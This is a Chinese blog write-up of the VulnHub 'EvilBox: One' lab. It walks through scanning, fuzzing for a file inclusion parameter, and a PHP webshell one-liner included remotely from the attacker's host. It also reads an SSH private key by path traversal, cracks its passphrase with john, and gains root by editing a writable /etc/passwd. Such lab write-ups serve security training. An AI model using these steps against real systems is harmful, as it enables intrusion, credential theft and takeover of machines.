EvilBox(vulnhub)

最新推荐文章于 2024-07-05 11:48:47 发布
最新推荐文章于 2024-07-05 11:48:47 发布
阅读量476 收藏 2
点赞数 1
CC 4.0 BY-SA版权
分类专栏: Vulnhub靶场 文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/wcl20010/article/details/124577175
本文详细记录了一次针对EvilBox靶机的渗透测试过程,包括主机发现、端口扫描、目录扫描、漏洞利用和提权等步骤。通过nmap、dirsearch等工具,发现了SSH、HTTP服务,并利用文件包含漏洞尝试远程执行命令。最终,通过爆破获取私钥并修改/etc/passwd实现提权。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

EvilBox

目录

EvilBox: One ~ VulnHub

1.主机发现
arp-scan -l
namp -Pn 192.168.56.0
2.端口扫描
nmap -p22.80 -sV 192.168.56.105

22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
3.目录扫描
dirsearch -u 192.168.56.105
还有别的工具:dirb gobuster等
[19:35:36] 200 -  /robots.txt                                       
[19:35:37] 200 -  /secret/                                          
[19:35:37] 301 -  /secret  ->  http://192.168.56.105/secret/

什么都没发现,继续往下扫目录:能够发现evil.php打开依旧是空白的

dirb  http://192.168.56.105/secret -w /usr/share/webshells/SecLists-master/Discovery/Web-Content/directory-list-1.0.txt  -X .php

字典链接:

https://github.com/danielmiessler/SecLists

4.漏洞发现利用

ssh爆破尝试不成功。目录中存在evil.php,依旧是空白的,像这种页面不存在参数的情况下,需要爆破出参数。

FUZZ爆破参数:wfuzz -u "http://192.168.56.105/secret/evil.php?FUZZ=../../../../../etc/passwd" -w /usr/share/SecLists-master/Discovery/Web-Content/burp-parameter-names.txt

回显过多,没筛选:添加参数筛选一下:得到参数command

wfuzz -u "http://192.168.56.105/secret/evil.php?FUZZ=../../../../../etc/passwd" -w /usr/share/SecLists-master/Discovery/Web-Content/burp-parameter-names.txt --hw 0

请添加图片描述

请添加图片描述

因为有文件包含漏洞:尝试远程包含漏洞是否可行

vi a.php
<?php $var=shell_exec($_GET['cmd']); echo $var ?>

kali打开apache服务
systemctl start apache2
查看ip a

?commond=http://192.168.56.102/a.php?cmd=id

测试结果失败。

伪协议尝试一下:查看下evil文件

command=php://filter/comvert.base64-encode/resource=evil.php

请添加图片描述
那么尝试下写入数据:

command=php://filter/comvert.base64-decode/resource=test.php&txt=MTlz(base64加密后的值)

读取:

192.168.56.105/secret/test.php

结果依旧是失败的。

只能看看用户的线索了:

ssh mowree@192.168.56.105 -v -v参数可以知道该用户支持哪些登录方式
请添加图片描述

支持公钥和密码,那么我们就去找公钥的内容:

文件位置:

http://192.168.56.105/secret/evil.php?command=../../../../../home/mowree/.ssh/authorized_keys
http://192.168.56.105/secret/evil.php?command=../../../../../home/mowree/.ssh/id_rsa


id_rsa : 生成的私钥文件
id_rsa.pub : 生成的公钥文件
authorized_keys

请添加图片描述

把私钥复制放在文件中,增加权限,登陆时使用即可:
在这里插入图片描述

在这里插入图片描述

但是这个私钥经过了加密:还需要输入密码。那我们就去尝试爆破,使用大字典去爆破。

cp /usr/share/wordlists/rockyou.txt.gz .   #这是kali自带的大字典

解压:gunzip rockyou.txt.gz

不过可以使用 john进行离线密码破解,先使用john 的插件将 id_rsa转换成可以被破解的样式,然后使用john进行破解

cd /usr/share//john/
./ssh2john.py ~/id_rsa > ~/hash
cd   
ls     #可以看到hash文件了

爆破:

john hash --wordlist=rockyou.txt

很快就出来了:unicorn
在这里插入图片描述

5.提权

进入用户后提权:一般查看history,sudo -l,crontab -l 计划任务
在这里插入图片描述

还有uname -a 查看版本。searchsploit 4.19 尝试过,没用

还有suid的提取方法:
find / -perm /4000 2>/dev/null 4000代表的suid的权限
在这里插入图片描述

没找到能够利用的文件。

find / -perm /2000 2>/dev/null 2000 代表sgid的文件

在这里插入图片描述

没找到能够利用的文件。

最后找能够写入权限的文件,说不定文件能够写入,文件也是root权限运行

find / -writable 2>/dev/null | grep -v proc

看到了一个/etc/passwd 这个文件居然改写。
在这里插入图片描述

利用方法:

openssl passwd -1     -1代表一种加密方式
输入密码:123
再次输入:123
$1$2u5S3KDD$sD9r4Zdg2PBYfP6S.Wgru/
然后编辑 /etc/passwd
把root的密码x   修改成 $1$2u5S3KDD$sD9r4Zdg2PBYfP6S.Wgru/
最后: su root 密码123
Vulnhub靶机:EvilBox-One
qq_48904485的博客
01-20 1060
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:EvilBox-One(10.0.2.25)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/evilbox-one,736/
VnlnHub EvilBox---One
weixin_45682839的博客
09-07 1026
VnlnHub EvilBox---One靶场通关攻略记录,涉及知识包括:端口服务探测、铭感目录搜集、参数爆破、任意文件包含漏洞、任意文件读取、ssh私钥爆破、linux本地提权(系统权限漏洞提权)
vulnhubEvilBox: One
qwweggfe的博客
09-01 1167
文章目录 信息搜集 网页渗透 提权 总结 前言 目前网络安全越来越受到国家的重视,你可以通过本次黑盒的学习,学习到一些关于网络安全的知识,希望对您有所帮助! 提示:以下是本篇文章正文内容,下面案例可供参考 一、信息搜集 首先进行IP扫描 让我们看看看他开启了哪些端口 nmap -sC -sV 192.168.181.157 -p- -v --min-rate=20000 由于80端口打开,于是进行网页访问 于是进行目录扫描 gobuster dir -...
VulnHub日记(十一):EvilBox-One
Dawn_Xi的博客
09-28 1732
靶机介绍 虚拟机链接:EvilBox: One ~ VulnHub 参考博客:EvilBox Writeup - Vulnhub - Walkthrough - Security 开始练习 本机ip:192.168.56.102 虚拟机ip:192.168.56.125 netdiscover查找ip ediscover -r 192.168.56.0/24 nmap扫描开放端口及服务 nmap -A 192.168.56.125 访问80端口并使用dirsearch扫描..
vulnhub靶机--EvilBox
weixin_46107179的博客
04-13 391
靶机下载地址:靶机下载地址 主机发现 信息搜集 通过nmap扫描,得知开放22,80端口,版本信息以及相关的服务信息 浏览器访问该地址,发现只是一个Apache2默认的页面,然后利用gobuster进行目录和文件扫描,通过-x指定文件类型,得到一个secret的目录和index.html以及robots.txt 访问index.html是刚刚那个Apache2的默认页面,然后访问robots.txt,是一个像似用户名,用hydra爆破ssh并未成功;最后访问secret目录,发现是一个空白页,通过源码
EvilBox---One
09-04
你可以从靶场的官网地址https://download.vulnhub.com/evilbox/EvilBox—One.ova下载靶场的镜像文件进行安装。 在靶场中,你可以使用不同的工具和技术来发现漏洞和进行渗透测试。<span class="em">1</span><span ...
耳切法处理多边形三角划分
热门推荐
游戏路上的小学生
10-18 2万+
2016.10.18  孙广东 http://blog.youkuaiyun.com/u010019717         日文《【Unity】Ear Clipping Triangulation》, 它使用这个技术 弄了软体的功能  复原了 Soft Body - p5.js    这也是我Get到的新概念. 一种 网格多边形三角化算法之一。 我之前  也写过文章关于在Unity下 使用Mesh...
Unity3D:详解注视旋转(Quaternion.LookRotation)
hypercube2的专栏
08-27 527
Unity3D:详解注视旋转(Quaternion.LookRotation) 2014-07-25 16:36 275人阅读 评论(0) 收藏 举报  分类: Unity3D(1)  版权声明:本文为博主原创文章,未经博主允许不得转载。         在编写怪物位置看到目标点,之前一直认为因该这样写,Quaternion.lookRota...
Vulnhub靶场】EVILBOX: ONE
DG_s1mple
03-24 2587
环境准备 下载靶机后导入到vmware 靶机IP地址为:192.168.2.16 攻击机IP地址为:192.168.2.18 信息收集 使用nmap扫描一下靶机开放的端口信息 只开放了ssh跟http服务 我们访问一下他的网站看看 是最基础的网站,没有什么信息,我们扫描一下 有一个文件夹,我们也去访问一下 是一个空白界面,什么也没有,我们扫描一下这个目录下的文件 有一个php文件,我们也访问一下 也是空的 渗透开始 空的很正常,因为是php代码,所以我们爆破一下是不是有什么参数 发现是文件包
evil-box靶场记录
胖虎的博客
11-16 1249
evilbox渗透测试记录
SecLists:彭特氏伴侣-开源
04-25
SecLists是最终的安全测试人员的伴侣。 它是安全评估期间常用的各种类型列表的集合,所有这些都集中在一个地方。 SecLists通过方便地在一个存储库中提供安全测试人员可能需要的所有列表,来帮助提高安全测试的效率和生产率。 列表类型包括用户名,密码,URL,模糊有效载荷,敏感数据模式,Web Shell等。 测试人员所需要做的就是将这个仓库放入一个新的测试箱中,他将可以访问他可能需要的每种列表。
SecLists:SecLists是安全测试人员的伴侣。 它是在安全评估期间使用的多种类型列表的集合,这些列表集中在一个地方。 列表类型包括用户名,密码,URL,敏感数据模式,模糊有效载荷,Web Shell等
02-08
关于安全列表 SecLists是安全测试人员的伴侣。 它是在安全评估期间使用的多种类型列表的集合,这些列表集中在一个地方。 列表类型包括用户名,密码,URL,敏感数据模式,模糊有效载荷,Web Shell等。 目的是使安全测试人员能够将此存储库拉到新的测试箱中,并可以访问可能需要的每种列表。 该项目由 , 和。 安装 压缩 wget -c https://github.com/danielmiessler/SecLists/archive/master.zip -O SecList.zip \ && unzip SecList.zip \ && rm -f SecList.zip Git(小) git clone --depth 1 https://github.com/danielmiessler/SecLists.git Git(完整) git clone https:/
Vulnhub靶机:EVILBOX_ ONE(很详细)
LainWith的博客
07-08 3728
系列:EvilBox(此系列共1台) 发布日期:2021年08月16日 **难度等级:**低→中 **打靶目标:**取得 root 权限 + 2 Flag 靶机地址:https://www.vulnhub.com/entry/evilbox-one,736/ 涉及攻击方法:netdiscover主机发现 对于VulnHub靶机来说,出现“PCS Systemtechnik GmbH”就是靶机。 打开就是一个ubuntu站点,看不出什么东西,下一步自然是目录扫描了。 常规的dirsearch扫描完毕后,发现
打靶第六周-EvilBox---One
wcwdnmdnmd的博客
04-09 3349
打靶第六周-EvilBox---One
【每日打靶练习】vulnhub--Evilbox-One(中低)
leo788的博客
01-24 475
通过修改/etc/passwd中的root的密码即可,但是这里靶机的vim我无法进行修改,应该是版本问题,所以前面操作仅供参考,后面按照顺序修改完用户密码后即可登录,达到越权目的。利用ffuf来进行模糊匹配,前一个字典用来匹配参数关键字,后一个字典自己定义用来匹配执行,结果是啥也没匹配到,考虑换一个思路,利用是php格式,猜测页面是否存在文件包含漏洞,然后再利用远程包含上传webshell进行提权的思路,测试一下。访问一下80端口,没什么信息,对目录进行扫描。secret页面:空的,查看源码也空。
EvilBox---One靶场实战
m0_72212352的博客
11-04 378
11.id_rsa 可以用于ssh登陆,但缺少密码,需要破解密码,需要用到一个脚本: ssh2john。使用john破解密码,使用kali自带的字典:/usr/share/john/password.lst。9.由于开放了22端口,尝试远程连接,看是否能使用密钥对登录,找到mowree的密钥。原因是由于查询到的密钥文件内容直接复制,然后在kali本地粘贴这些内容导致的。16.进入root目录下发现root.txt文件,查看其内容得到第二个flag。查看/etc/passw文件内容,发现mowree用户。
EVILBOX---ONE 打靶流程
qq_53733257的博客
11-24 1190
EVILBOX---ONE 打靶流程
红日靶场----(二)2.信息收集
最新发布
zhouA0221的博客
07-05 1361
SecLists是安全测试人员的好帮手。它是安全评估期间使用的多种列表类型的集合,收集在一个地方。列表类型包括用户名、密码、URL敏感数据模式、模糊测试(Fuzz)payload、WebShell。内容管理系统(英语:content management system 缩写CMS)通常指门户或商业网站的发布或管理系统互联网上有很多CMS被广泛使用,例如WordPress、Joomla、Drupal、织梦、帝国等YXcms是一款基于PHP+MySQL开发的网站管理系统。
Healthcare靶机总结
qq_45301512的博客
01-12 578
靶机下载地址:打开靶机,使用nmap扫描出靶机的ip和所有开放的端口可以看到,靶机开放了21端口和80端口21端口为ftp的端口,一般遇到这种,就可以考虑ftp的匿名登录,我们可以试一下用户名anonymous,没有密码,这里登录失败那么只能根据80端口,打开网站,然后去网站入手打开网站先试试功能点,看能否找到可利用的漏洞,这里没发现漏洞点然后可以在源代码里面找找看有没有提示,这里也没有。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值